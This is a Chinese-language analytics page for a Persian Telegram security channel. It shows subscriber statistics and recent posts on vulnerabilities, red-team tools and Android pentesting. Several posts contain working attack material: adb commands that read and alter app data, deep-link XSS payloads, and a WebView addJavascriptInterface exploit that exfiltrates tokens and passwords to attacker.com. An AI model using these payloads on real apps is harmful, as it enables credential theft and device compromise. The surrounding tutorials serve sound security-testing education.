ch
Feedback
Security Analysis

Security Analysis

前往频道在 Telegram

- Offensive Security (Red Teaming / PenTesting) - BlueTeam (OperationSec, TreatHunting, DFIR) - Reverse Engineering / Malware Analysis - Web Security - Cryptography - Steganography - Forensics Contact : @DrPwner

显示更多
伊朗26 839技术与应用10 541

📈 Telegram 频道 Security Analysis 的分析概览

频道 Security Analysis (@securation) 波斯语 语言赛道中的 是活跃参与者。目前社区聚集了 11 834 名订阅者,在 技术与应用 类别中位列第 10 541,并在 伊朗 地区排名第 26 839

📊 受众指标与增长动态

невідомо 创建以来,项目保持高速增长,吸引了 11 834 名订阅者。

根据 28 六月, 2026 的最新数据,频道保持稳定运转。过去 30 天订阅人数变化为 173,过去 24 小时变化为 6,整体触达仍然可观。

  • 认证状态: 未认证
  • 互动率 (ER): 平均受众互动率为 20.92%。内容发布后 24 小时内通常能获得 10.77% 的反应,占订阅者总量。
  • 帖子覆盖: 每篇帖子平均可获得 2 472 次浏览,首日通常累积 1 273 次浏览。
  • 互动与反馈: 受众积极参与,单帖平均反应数为 6
  • 主题关注点: 内容集中在 ابزار, شناسایی, next.js, مهاجم, داده 等核心主题上。

📝 描述与内容策略

作者将该频道定位为表达主观观点的平台:
- Offensive Security (Red Teaming / PenTesting) - BlueTeam (OperationSec, TreatHunting, DFIR) - Reverse Engineering / Malware Analysis - Web Security - Cryptography - Steganography - Forensics Contact : @DrPwner

凭借高频更新(最新数据采集于 29 六月, 2026),频道始终保持新鲜度与高覆盖。分析显示受众积极互动,使其成为 技术与应用 类别中的关键影响点。

11 834
订阅者
+624 小时
+477
+17330

数据加载中...

相似频道
امنیت سایبری | Cyber Security
15.1K
امنیت سایبری | Cyber Security
از نگاه احسان
7.1K
از نگاه احسان
Hypersec
4.1K
Hypersec
ناویا، ماشین کاوش اپلای
3.9K
ناویا، ماشین کاوش اپلای
کانال تخصصی امنیت سایبری «کتاس»
1.7K
کانال تخصصی امنیت سایبری «کتاس»
avatar
1
更多频道
标签云
ابزار33
شناسایی28
next.js19
مهاجم18
داده14
ساختار13
مسیر13
اجرا12
فایل12
معکوس12
نسخه11
لینوکس10
ویندوز10
#redteam9
افزار9
بدافزار9
برنامه‌نویسی9
تعریف9
حمله9
سپه8
进出提及
---
---
---
---
---
---
吸引订阅者
六月 '26
六月 '26
+204
在3个频道中
五月 '26
+202
在7个频道中
Get PRO
四月 '26
+86
在0个频道中
Get PRO
三月 '26
+48
在4个频道中
Get PRO
二月 '26
+69
在1个频道中
Get PRO
一月 '26
+29
在0个频道中
Get PRO
十二月 '25
+110
在6个频道中
Get PRO
十一月 '25
+128
在4个频道中
Get PRO
十月 '25
+32
在0个频道中
Get PRO
九月 '25
+32
在3个频道中
Get PRO
八月 '25
+48
在3个频道中
Get PRO
七月 '25
+103
在6个频道中
Get PRO
六月 '25
+72
在0个频道中
Get PRO
五月 '25
+21
在0个频道中
Get PRO
四月 '25
+54
在0个频道中
Get PRO
三月 '25
+52
在3个频道中
Get PRO
二月 '25
+4
在0个频道中
Get PRO
一月 '25
+12
在2个频道中
Get PRO
十二月 '24
+42
在0个频道中
Get PRO
十一月 '24
+138
在1个频道中
Get PRO
十月 '24
+133
在1个频道中
Get PRO
九月 '24
+495
在3个频道中
Get PRO
八月 '24
+655
在5个频道中
Get PRO
七月 '24
+754
在6个频道中
Get PRO
六月 '24
+585
在1个频道中
Get PRO
五月 '24
+604
在4个频道中
Get PRO
四月 '24
+763
在4个频道中
Get PRO
三月 '24
+824
在3个频道中
Get PRO
二月 '24
+937
在5个频道中
Get PRO
一月 '24
+821
在6个频道中
Get PRO
十二月 '23
+933
在6个频道中
Get PRO
十一月 '23
+166
在3个频道中
Get PRO
十月 '23
+216
在2个频道中
Get PRO
九月 '23
+640
在0个频道中
Get PRO
八月 '23
+139
在0个频道中
Get PRO
七月 '23
+93
在0个频道中
Get PRO
六月 '23
+40
在0个频道中
Get PRO
五月 '23
+71
在0个频道中
Get PRO
四月 '23
+103
在0个频道中
Get PRO
三月 '23
+61
在0个频道中
Get PRO
二月 '23
+69
在0个频道中
Get PRO
一月 '23
+94
在0个频道中
Get PRO
十二月 '22
+119
在0个频道中
Get PRO
十一月 '22
+127
在0个频道中
Get PRO
十月 '22
+88
在0个频道中
Get PRO
九月 '22
+156
在0个频道中
Get PRO
八月 '22
+143
在0个频道中
Get PRO
七月 '22
+323
在0个频道中
Get PRO
六月 '22
+116
在0个频道中
Get PRO
五月 '22
+91
在0个频道中
Get PRO
四月 '22
+131
在0个频道中
Get PRO
三月 '22
+169
在0个频道中
Get PRO
二月 '22
+120
在0个频道中
Get PRO
一月 '22
+131
在0个频道中
Get PRO
十二月 '21
+174
在0个频道中
Get PRO
十一月 '21
+225
在0个频道中
Get PRO
十月 '21
+230
在0个频道中
Get PRO
九月 '21
+183
在0个频道中
Get PRO
八月 '21
+383
在0个频道中
Get PRO
七月 '21
+503
在0个频道中
Get PRO
六月 '21
+352
在0个频道中
Get PRO
五月 '21
+45
在0个频道中
Get PRO
四月 '21
+127
在0个频道中
Get PRO
三月 '21
+128
在0个频道中
Get PRO
二月 '21
+51
在0个频道中
Get PRO
一月 '21
+139
在0个频道中
Get PRO
十二月 '20
+1 653
在0个频道中
日期
订阅者增长
提及
频道
29 六月+17
28 六月+7
27 六月+3
26 六月+15
25 六月+5
24 六月+11
23 六月+9
22 六月+5
21 六月+1
20 六月+3
19 六月+5
18 六月+7
17 六月+9
16 六月+3
15 六月+12
14 六月+5
13 六月+13
12 六月0
11 六月+3
10 六月+4
09 六月+1
08 六月+11
07 六月+10
06 六月0
05 六月+9
04 六月+8
03 六月+4
02 六月+6
01 六月+18
频道帖子
Security Analysis
⭕️ مقاله اخیر Maor Sabag درباره توسعه implant پیشرفته، نکته‌ای کلیدی را برجسته می‌کند: تکنیک‌های Obfuscation مبتنی بر ROP (مانند Ekko و Kraken Mask) در فرآیندهای دارای CFG فعال با چالش جدی مواجه می‌شوند. مکانیزم CFG ویندوز از طریق یک bitmap در runtime، صحت آدرس‌های Indirect Call را اعتبارسنجی می‌کند؛ از آنجا که gadget های ROP معمولاً به آدرس‌های میانی توابع در ntdll اشاره دارند که در metadata کامپایلر ثبت نشده‌اند، سیستم با خطای STATUS_STACK_BUFFER_OVERRUN متوقف می‌شود. راه‌حل ارائه‌شده، استفاده از API غیرمستند NtSetInformationVirtualMemory با کلاس VmCfgCallTargetInformation است که امکان ثبت دستی آدرس‌های مجاز را فراهم می‌کند. این رویکرد نشان می‌دهد که در محیط‌های مدرن، صرف استفاده از ROP کافی نیست؛ بلکه باید با زیرساخت‌های امنیتی OS به صورت تعاملی برخورد کرد. یک یادآوری برای دفاع‌کنندگان که لایه‌های حفاظتی باید در کنار هم و به صورت Defense-in-Depth پیاده‌سازی شوند. #RedTeam #MalDev #Evasion @securation

2
⭕️ وضعیت امنیت بانک ها در ایران @securation
⭕️ وضعیت امنیت بانک ها در ایران @securation
2 894
3
⭕️ ‏DCOMIllusionist ابزاری در حوزه‌ی post-exploitation است که با بهره‌گیری از سازوکار خودکار deserialization در سرورهای ‎.NET DCOM، قابلیت lateral movement را به‌صورت کاملاً fileless ارائه می‌دهد. این ابزار با دستکاری هدفمند رجیستری روی میزبان هدف، مسیر class resolution را منحرف کرده و deserialization را به سمت نمونه‌سازی یک type تحت کنترل مهاجم هدایت می‌کند؛ در نتیجه payload مستقیماً در حافظه‌ی فرایند هدف اجرا می‌شود. قابلیت cross-session exploitation نیز امکان اجرای کد در security context کاربری دیگر را فراهم می‌سازد. با توجه به نیاز این تکنیک به دسترسی administrative بر روی هر دو endpoint، آن را باید یک روش post-compromise برای جابه‌جایی جانبی دانست. اهمیت تحلیلی این مورد در زنجیرسازی مؤلفه‌های مشروع سیستم‌عامل (DCOM، ‎.NET remoting و registry) نهفته است؛ ترکیبی که یک primitive مخفیانه می‌سازد و از سازوکارهای تشخیص مبتنی بر فایل عبور می‌کند، لذا ضرورت اتکا به behavioral detection و رصد تغییرات حساس رجیستری را برجسته می‌نماید. #RedTeam #DCOM @securation
1 931
4
⭕️ ‏آسیب‌پذیری Onelogon که توسط تیم RUB-SoftSec در مقاله USENIX WOOT’26 مستند شده، یک نقص امنیتی ناشی از پیاده‌سازی ناقص پچ Zerologon است؛ مایکروسافت برای حفظ سازگاری با سیستم‌های قدیمی، سازوکار استثنای VulnerableChannelAllowList را در پروتکل Netlogon اضافه کرد که همین لیست به مهاجم اجازه می‌دهد با حمله Meet-in-the-Middle و بدون نیاز به credential معتبر، کنترل کامل Domain Controller و کل دامنه را به دست آورد. برخلاف Zerologon که همه DC های بدون پچ را تهدید می‌کرد، Onelogon تنها حساب‌های موجود در این لیست را هدف می‌گیرد، بنابراین توصیه می‌شود تنظیمات GPO و کلید رجیستری مربوطه فوراً بررسی و حساب‌های غیرضروری از لیست حذف شوند. GitHub #RedTeam #AD #OnLogon @securation
1 850
5
⭕️ ‏آسیب‌پذیری از نوع SSRF با شدت CVSS 8.8 (High) در لایه‌ی یکپارچه‌سازی Exchange با OneDrive Pro / WOPI شناسایی شده است. در فرآیند صدور توکن WOPI، آدرس مقصد طی زنجیره‌ی TryTwice() → GetTokenRequestWebResponse() → GetWacUrl() → WebRequest.CreateHttp(url) پردازش می‌شود، اما پارامتر url پیش از ارسال هیچ اعتبارسنجی‌ای نمی‌شود؛ نه Uri.IsWellFormedUriString() اعمال می‌گردد و نه whitelist برای scheme. در نتیجه یک کاربر کم‌سطح می‌تواند با تزریق file://، http://127.0.0.1:PORT یا http://169.254.169.254/ سرور را وادار به خواندن فایل‌های محلی، شناسایی سرویس‌های داخلی و استخراج metadata کند. از آنجا که درخواست از سوی خود Exchange صادر می‌شود، محدودیت‌های فایروال دور زده شده و مهاجم به منابع داخلی غیرقابل‌دسترس از بیرون می‌رسد؛ موضوعی که در محیط‌های enterprise مبتنی بر Active Directory و storage مشترک می‌تواند به lateral movement منجر شود. تا انتشار وصله‌ی رسمی Microsoft، توصیه می‌شود OneDrive Pro integration غیرفعال و دسترسی خروجی شبکه‌ای سرور محدود شود. POC #RedTeam #VulnerabilityResearch @securation
1 946
6
⭕️ کتابخانه tokenex برای مدیریت امن اعتبارنامه‌های ابری این کتابخانه امکان تبادل امن Identity Token با اعتبارنامه‌های موقت (T
⭕️ کتابخانه tokenex برای مدیریت امن اعتبارنامه‌های ابری این کتابخانه امکان تبادل امن Identity Token با اعتبارنامه‌های موقت (Temporary Cloud Credentials) را فراهم می‌کند و به توسعه‌دهندگان اجازه می‌دهد بدون ذخیره‌سازی کلیدهای دائمی، به سرویس‌های ابری احراز هویت شوند. از قابلیت‌های کلیدی آن می‌توان به پشتیبانی داخلی از AWS، GCP، Azure، OCI، Kubernetes و OAuth2 اشاره کرد. این رویکرد با تکیه بر توکن‌های موقتی, سطح حمله ناشی از افشای Credential ها را کاهش داده و امنیت محیط‌های Cloud-Native و Multi-Cloud را بهبود می‌بخشد. Blog Post #aws #azure #gcp #security @securation
1 726
7
⭕️ اکستنشن APIReaper برای ساده‌تر کردن تست API داخل Burp Suite طراحی شده است. با این ابزار می‌تونید Swagger یا Postman Collection رو لود کنید، endpointها رو به‌صورت دسته‌بندی‌شده ببینی و بدون نیاز به وارد کردن دستی، درخواست‌ها رو مستقیم به Repeater بفرستید. همچنین امکان تنظیم Base URL و Authorization توکن‌های مختلف هم به‌صورت یکجا روی همه درخواست‌ها وجود داره. مناسب برای Pentester و Bug Hunter ها. لینک پروژه: https://github.com/rjsoheil/APIReaper #API #Burp #Web @securation
2 900
8
بچه های اهل یزد باشند کسی هست به من پیام بده
144
9
⭕️ نکته‌ی مهم تحقیق Check Point روی LangGraph این است که در معماری‌های Agentic، باگ‌های کلاسیک AppSec می‌توانند impact بسیار جدی‌تری پیدا کنند؛ برای مثال، یک SQL Injection در checkpointer صرفاً به data leakage محدود نمی‌شود، چون checkpoint در LangGraph بخشی از state اجرایی graph برای resume/replay است. اگر مهاجم بتواند از طریق SQLi رکوردهای checkpoint یا metadata مرتبط را تغییر دهد و سیستم هنگام restore آن state را trusted فرض کند، مسیر deserialization / state reconstruction می‌تواند به نقطه‌ی اجرای payload تبدیل شود و زنجیره تا RCE پیش برود. ‏ takeaway اصلی این تحقیق این است که در AI Agentها، memory و persistence layer فقط storage نیستند؛ بلکه بخشی از control flow آینده‌ی سیستم محسوب می‌شوند، بنابراین باید مثل untrusted input با آن‌ها برخورد شود: parameterized query، schema validation، serialization امن، least privilege برای DB/runtime و sandbox کردن tool execution دیگر optional نیستند. #AIsecurity #AppSec #AgenticAI @securation
3 756
10
⭕️ c2detect Tools C2 server fingerprinter — Cobalt Strike, Sliver, Mythic, Havoc, Brute Ratel #infosec #C2 #ThreatHunting @se
⭕️ c2detect Tools C2 server fingerprinter — Cobalt Strike, Sliver, Mythic, Havoc, Brute Ratel #infosec #C2 #ThreatHunting @securation
3 556
11
⭕️ پنتست کامپوننت اپ های اندرویدی پارت سوم - (allowBackup, debuggable) 1) allowBackup: این فلگ در AndroidManifest.xml تعیین میکند که ایا سیستم اجازه دارد از دیتا های روت برنامه برای کاربر بکاپ بگیرد یا خیر، اگر مقدار این فلگ true باشد مهاجمی که دسترسی فیزیکی به دستگاه دارد با استفاده از adb میتواند تمامی دیتا های روت برنامه را استخراج کند(در اندروید 12 به بعد باید حتما فلگ debuggable نیز true باشد) که این دیتا شامل دیتابیس ها، SharedPreferences و تمامی فایل های ذخیره شده در روت برنامه می باشد!(بدون اینکه دستگاه روت شده باشد) این آسیب پذیری زمانی بحرانی میشود که اپ اطلاعات حساسی مانند توکن اهراز هویت، کلید های رمزنگاری و یا اطلاعات خصوصی کاربر را در مسیر روت ذخیره کرده باشد؛ راهکار امنیتی مطابق استاندارد MASTG غیر فعال کردن فلگ بکاپ در نسخه ریلیز برنامه میباشد، یا در صورت نیاز به امکان بکاپ، میبایست از طریق backup_rules.xml امکان بکاپ گیری از فایل های حساس را جلوگیری نمود #backup adb backup -apk com.example.app -f backup.ab #restore adb restore backup.ab استخراج داده ها از فایل بکاپ backup.ab توسط ابزار abe: https://github.com/nelenkov/android-backup-extractor 2) debuggable: این فلگ نیز در AndroidManifest.xml قرار دارد، اگر این فلگ برای یک اپ در نسخه ریلیز برابر true باشد، یک آسیب پذیری جدی محسوب میشود؛ چراکه مهاجم میتواند با استفاده از ابزار هایی مانند jdb به پروسه اپ متصل شده مقادیر متغیر های حساس در حافظه مثل توکن اهراز هویت یا کلید های api را بخواند و یا حتی flow اجرای برنامه را تغییر دهد، همچنین در اندروید 12 به بعد پیش شرط اجرای موفق دستور adb backup برای استخراج دیتای برنامه است، علاوه براین به واسطه دستور run-as که از adb shell در دسترس است میتوان به دایرکتوری روت اپ دیباگیبل دسترسی داشت و حتی فایل های آنرا ویرایش کرد و سو استفاده های لازم را به انجام رساند! بنابراین لازم است که در نسخه ریلیز و موقع انتشار عمومی برنامه مقدار این فلگ را برابر false قرار دهید # printing the content of SharedPref adb shell "run-as com.target.app cat shared_prefs/AppPref.xml" # listing all db names adb shell "run-as com.target.app ls -la databases/" # manipulating isLoggedIn to true using sed adb shell "run-as com.target.app sed -i 's/isLoggedIn\" value=\"false\"/isLoggedIn\" value=\"true\"/' shared_prefs/AppPref.xml" # backing up entire directory adb shell "run-as com.target.app tar -czf - /data/data/com.target.app" > backup.tar.gz @securation #Android #RE #Owasp #Mastg #allowBackup
4 388
12
⭕️ در تحلیل آسیب‌پذیری بحرانی CVE-2026-20182 در پشته شبکه Cisco Catalyst SD-WAN، یک نقص منطقی (Logic Bug) قابل توجه در تابع vbond_proc_challenge_ack شناسایی شد . این حفره امنیتی در لایه DTLS (پورت ۱۲۳۶) و سرویس vdaemon واقع شده است؛ جایی که برخلاف سایر تجهیزات مانند vSmart یا vEdge، برای دستگاه‌های نوع ۲ یعنی vHub، هیچ مکانیزم راستی‌آزمایی (Verification) تعریف نشده است. به محض دریافت پیام CHALLENGE_ACK با هویت جعلی، فلگ peer->authenticated بدون هیچ‌گونه بررسی گواهی یا امضای سخت‌افزاری روی True تنظیم می‌شود،به واسطه این نقص در فرآیند احراز هویت، مهاجم می‌تواند از طریق پیام نوع ۱۴، کلید خود را مستقیماً به فایل authorized_keys کاربر سطح بالای vmanage-admin تزریق کرده و دسترسی دائمی برای اجرای دستورات NETCONF روی پورت ۸۳۰ به دست آورد . با توجه به اینکه هیچ راهکار موقتی (Workaround) برای این نقص وجود ندارد، ارتقای فوری به نسخه‌های اصلاح‌شده جهت جلوگیری از نفوذ کامل به زیرساخت توصیه می‌شود . #RedTeam #Cisco #vulnerability_Analysis @securation
4 063
13
⭕️ خبر جنجالی این چند روزه مربوط به دعوای مایکروسافت با یه محقق امنیتی که چندتا آسیب‌پذیری خطرناک ویندوز رو عمومی منتشر کرده بود و بعدش GitHub اکانت هکر رو بست. داستان فقط بستن اکانت نیست؛ طرف میگه مایکروسافت عملاً زندگیشو خراب کرده چون نه توی برنامه bug bounty حمایتی دیده، نه گزارش‌هاش جدی گرفته شده و حالا هم دسترسیش قطع شده. چیزی که ماجرا رو حساس کرده اینه که این محقق امنیتی برخلاف روال معمول،مستقیم جزئیات آسیب پذیری رو منتشر کرده،یعنی منتظر اصلاح مشکل از سمت مایکروسافت نمونده. همین باعث شده الان بحث اصلی این باشه که آیا مایکروسافت حق داشته برای جلوگیری از پخش شدن این ابزارها اکانتشو ببنده، یا چون GitHub مال خود مایکروسافته، از قدرتش برای ساکت کردن منتقد استفاده کرده. به نظرم این اتفاق یه تصویر جالب از دنیای امنیت امروز نشون میده. از یه طرف شرکت‌ها می‌ترسن آسیب‌پذیری‌ها عمومی بشن و سریع مورد سوءاستفاده قرار بگیرن، از اون طرف پژوهشگرها میگن وقتی شرکت‌ها همکاری نمی‌کنند، انتشار عمومی تنها راه فشار آوردنه. البته این وسط گیت هاب اکانت خیلی از دوستان ایرانی رو هم بن کرد دستش درد نکنه البته احتمالا بخاطر استفاده از SNI Spoofing این اتفاق افتاد ولی شماها دیگ اینکارارو نکنین که بن میشید ! https://www.tomshardware.com/tech-industry/cyber-security/microsofts-github-bans-securitjy-researcher-who-posted-zero-day-windows-exploits-because-company-ruined-their-life-expert-claims-action-is-vindictive-and-promises-further-retaliation @securation
6 071
14
دوستان عزیز گروه تبادل دانش امنیت اطلاعات فعال است: https://t.me/DarkPwners
4 341
15
⭕️ در زیر یک تکه کد آسیب‌پذیر آورده شده است: WebView webview = new WebView(this); WebSettings webSettings = webview.getSettings(); webSettings.setJavaScriptEnabled(true); webView.addJavascriptInterface(new WebAppInterface(this), "Android"); webView.loadUrl(getIntent().getStringExtra("url")); کد اکسپلویت کامل <!DOCTYPE html> <html> <head>     <title>POC - WebView addJavascriptInterface</title> </head> <body>     <h2> Exploiting addJavascriptInterface</h2>     <div id="result"></div>         <script>         // مرحله 1: سرقت دیتا از متدهای exposed         try {             var methods = ['getUserToken', 'getUserId', 'getEmail', 'getPassword'];             for (var method of methods) {                 try {                     var data = window.Android[method]();                     if (data) {                         document.getElementById('result').innerHTML +=                             '<p>Stolen: ' + method + ' = ' + data + '</p>';                         fetch('http://attacker.com/steal?data=' + encodeURIComponent(data));                     }                 } catch(e) {}             }         } catch(e) {}                 // مرحله 2: RCE (فقط در صورتی که getContext در کلاس جاوا تعریف شده باشه)         try {             var context = window.Android.getContext();             var classLoader = context.getClassLoader();             var Runtime = classLoader.loadClass('java.lang.Runtime')                 .getMethod('getRuntime', null)                 .invoke(null, null);             Runtime.exec(['su', '-c', 'id']);             document.getElementById('result').innerHTML += '<p> RCE Successful!</p>';         } catch(e) {             document.getElementById('result').innerHTML +=                 '<p> RCE not possible (no chain method)</p>';         }     </script> </body> </html> نسخه ساده‌تر (سرقت دیتا از متود های اکسپوزد) <!DOCTYPE html> <html> <head> <title>POC</title> </head> <body> <script> // سرقت دیتای هر متدی که در کلاس جاوا وجود داره var methods = ['getUserToken', 'getUserId', 'getEmail', 'getPassword']; for (var method of methods) { try { var data = window.Android[method](); if (data) { fetch('http://attacker.com/steal?data=' + encodeURIComponent(data)); alert('Stolen: ' + data); } } catch(e) {} } </script> </body> </html> نکته: این POC فرض می‌کنه که متدهایی مثل getUserToken() یا getPassword() در کلاس جاوا وجود دارن. نکته مهم تر! اینکه برای رسیدن به RCE کامل به واسطه رفلکشن در اندروید های بالاتر از 4.2+ امکان پذیر نیست مگر اینکه در کلاس جاوا فانکشنی توسط برنامه نویس تعریف شده باشد که Context آن اکتیویتی را ریترن کند!! برای مطالعه بیشتر: Owasp MASTG @securation #Android #RE #Owasp #Mastg #webview
3 545
16
⭕️ پنتست کامپوننت اپ های اندرویدی پارت دوم - وب ویو (Insecure WebView) آسیب پذیری های رایج وب ویو به شرح زیر است 1) setJavaScriptEnabled(true) فعال شدن جاوااسکریپت = راه ورود XSS. مهاجم می‌تونه اسکریپت مخرب تزریق کنه و توکن یا اطلاعات کاربر رو بدزده. # تزریق مستقیم javascript در WebView adb shell am start -n com.target.app/.WebViewActivity -d "javascript:alert('XSS')" # تزریق از طریق دیپ لینک با payload adb shell am start -n com.target.app/.WebViewActivity -d "myapp://webview?url=javascript:document.location='http://attacker.com/steal?c='document.cookie" 2) setAllowUniversalAccessFromFileUrls(true) اجازه میده فایل‌های HTML به همه فایل‌ scheme ها و محتوای هر origin دیگه ای دسترسی داشته باشن (دیسیبل شدن SOP). مهاجم می‌تونه فایل‌های دیتابیس و SharedPreferences رو بخونه. # خواندن فایل SharedPreferences adb shell am start -n com.target.app/.WebViewActivity -d "file:///data/data/com.target.app/shared_prefs/config.xml" # خواندن دیتابیس اپ adb shell am start -n com.target.app/.WebViewActivity -d "file:///data/data/com.target.app/databases/app.db" 3) addJavascriptInterface بسیار خطرناک! مهاجم می‌تونه از طریق JS، متدهای کلاس متصل شده رو فراخوانی کنه و به کد native دسترسی پیدا کنه → RCE کامل روی دستگاه. # تست وجود interface با alert adb shell am start -n com.target.app/.WebViewActivity -d "javascript:alert(Object.keys(window))" # اگر interface با نام "bridge" وجود داشت، اجرای فرمان adb shell am start -n com.target.app/.WebViewActivity -d "javascript:bridge.getClass().forName('java.lang.Runtime').getMethod('exec','java.lang.String[]').invoke(null,['su','-c','id'])" #فراخوانی یک متد از کلاس جاوا و نشت توکن کاربر(تنها در صورتی که متد در کلاس جاوا تعریف شده باشد) adb shell am start -n com.target.app/.WebViewActivity -d "javascript:bridge.getUserToken()" 4) setAllowContentAccess(true) اجازه دسترسی به Content Provider ها از طریق content://، مهاجم می‌تونه دیتابیس‌های داخلی، مخاطبین، یا فایل‌های حساس اپ رو بدزده. # دسترسی به دیتابیس اپ از طریق Content Provider adb shell am start -n com.target.app/.WebViewActivity -d "content://com.target.app.provider/users" # دسترسی به مخاطبین دستگاه (اگر Permission داشته باشه) adb shell am start -n com.target.app/.WebViewActivity -d "content://contacts/phones/" 5) لود URL از ورودی کاربر اگر loadUrl() مقدارش از Intent، دیپ لینک یا هر ورودی خارجی بیاد، مهاجم می‌تونه حملات زیر رو ترتیب بده: Scheme | حمله -----------------+------------------------------------ `javascript://` | XSS `file://` | خواندن فایل `intent://` | ریدایرکت به اکتیویتی غیراکسپورت شده `data:text/html` | XSS مستقیم # تست javascript scheme adb shell am start -n com.target.app/.WebViewActivity -d "myapp://open?url=javascript:alert('xss')" # تست file scheme برای خواندن فایل adb shell am start -n com.target.app/.WebViewActivity -d "myapp://open?url=file:///data/data/com.target.app/shared_prefs/token.xml" # تست intent scheme برای ردایرکت به Activity غیر اکسپورت شده adb shell am start -n com.target.app/.WebViewActivity -d "myapp://open?url=intent:#Intent;component=com.target.app/.PrivateActivity;end" # تست data:text/html برای XSS مستقیم adb shell am start -n com.target.app/.WebViewActivity -d "myapp://open?url=data:text/html,<script>alert('XSS')</script>" 📌 نکته مهم وب ویویی که exported نباشد، فقط لانچ مستقیم را مسدود می‌کند. اگر اپ از طریق deeplink، Notification، Broadcast، یا Content Provider به WebView برسد، همه آسیب‌پذیری‌ها همچنان قابل بهره‌برداری هستند. پس در پنتست: • اول مسیرهای رسیدن به WebView را پیدا کنید! (deeplink، Broadcast، Content Provider) • بعد آن مسیرها را برای ارسال payloadهای مخرب تست کن ✅ چک‌لیست پنتست: • مسیرهای رسیدن به WebView رو پیدا کن (deeplink، Broadcast، Content Provider) • تست XSS با javascript:alert() • تست خواندن فایل با file:///data/data/... • تست JavaScript Interface با Object.keys(window) • تست Content Provider با content://... @securation #Android #RE #Owasp #Mastg #webview
2 736
17
⭕️ آسیب‌پذیری بحرانی BadHost با شناسه CVE-2026-48710، فریمورک Starlette را هدف قرار داده و میلیون‌ها سرور هوش مصنوعی و اپلیکیشن مبتنی بر FastAPI استفاده می‌کنند را مورد تهدید جدی قرار داده است. آسیب پذیری Authentication Bypass ناشی از عدم اعتبارسنجی هدر HTTP Host است که به مهاجم اجازه می‌دهد با تزریق کاراکترهای خاص، کنترل‌های دسترسی مسیر Path-based Authorization را دور زده و به داده‌های حساس دسترسی پیدا کند. @securation
2 666
18
⭕️هشدار سایبری: بمب‌های ساعتی در دستگاه‌های شما پس از رفع محدودیت اینترنت بعد از حدود سه ماه محدودیت و قطعی، اتصال مجدد به اینترنت نباید با وب‌گردی، تست سرعت یا چک کردن شبکه‌های اجتماعی آغاز شود. دستگاه‌های ما اکنون به دو دلیل عمده به‌شدت آسیب‌پذیرند: تلنبار شدن آپدیت‌های امنیتی و نصب اجباری ابزارهای ناشناس برای دور زدن فیلترینگ. پیش از هر کاری، این چند اقدام حیاتی را انجام دهید: --پاکسازی مسیرهای نفوذ (VPN و Certificateها) فیلترشکن‌های متفرقه، کانفیگ‌های تلگرامی، فایل‌های APK ناشناس، DNSهای کاستوم و به‌ویژه گواهی‌های امنیتی (Certificates) که در این مدت نصب کرده‌اید را فوراً حذف کنید. این موارد اصلی‌ترین بستر برای حملات «مرد میانی» (MitM) و سرقت اطلاعات هستند. --دیوایسهای خانگی را حتما آپدیت کنید. --مودم و روترهای خانگی حتما آپدیت گردد. -- اعمال وصله‌های امنیتیِ تلنبار شده طی این چند ماه، ده‌ها آسیب‌پذیری حیاتی (Zero-Day) در دنیا کشف شده است. پیش از ورود به اکانت‌های حساس، سیستم‌عامل، آنتی‌ویروس و مخصوصاً مرورگرهای خود را به‌روزرسانی کنید. -- چرخش رمزهای عبور اگر در این مدت با ابزارهای ناشناس به اینترنت وصل شده‌اید، فرض را بر نشت اطلاعات بگذارید. رمز عبور ایمیل‌ها، شبکه‌های اجتماعی و پلتفرم‌های مالی را تغییر دهید و احراز هویت دو مرحله‌ای (2FA) را چک کنید. --مراقبت در برابر موج جدید فیشینگ منتظر سیل پیام‌های فریبنده با عناوین جذاب (مانند “دانلود فیلترشکن دائمی” یا “اینترنت هدیه جبرانی”) باشید. روی هیچ لینک ناشناسی کلیک نکنید. بهای قطعی اینترنت، نباید با به سرقت رفتن هویت دیجیتال و دارایی‌های شما پرداخت شود. هیجانِ اتصال مجدد را فدای امنیت خود نکنید. @securation
5 174
19
⭕️ در ذیل ابزار هایی که در طول پنتست کامپوننت های اندرویدی به کارتان می آید لیست شده است 1) Drozer https://github.com/WithSecureLabs/drozer 2) Apk Component Inspector https://github.com/thecybersandeep/apk-components-inspector 3) Noxen https://github.com/frankheat/noxen @securation
4 470
20
⭕️ فراخوانی یک اکتیویتی exported به واسطه یک اپ مهاجم به شکل زیر است(خارج از adb shell به صورت یک اپ مجزا) Manifest.xml <activity android:name=".AttackerActivity"> <intent-filter> <action android:name="android.intent.action.VIEW" /> <category android:name="android.intent.category.DEFAULT" /> </intent-filter> </activity> و در کد به شکل زیر فراخوانی انجام میشود Intent intent = new Intent("android.intent.action.MAIN"); intent.setComponent(new ComponentName("com.target.app", "com.target.app.SecretActivity")); //intent.putExtra("password","123") startActivity(intent); @securation #Android #RE #Owasp #Mastg #Intent
4 253
查看所有帖子